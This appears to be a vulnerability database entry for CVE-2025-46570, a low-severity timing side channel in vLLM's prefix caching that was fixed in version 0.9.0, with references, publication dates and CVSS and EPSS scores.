CVE-2025-46570

low

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

References

https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r

https://github.com/vllm-project/vllm/pull/17045

https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f

Details

Source: Mitre, NVD

Published: 2025-05-29

Updated: 2025-05-30

Risk Information

CVSS v2

Base Score: 2.1

Vector: CVSS2#AV:N/AC:H/Au:S/C:P/I:N/A:N

Severity: Low

CVSS v3

Base Score: 2.6

Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

Severity: Low

EPSS

EPSS: 0.00027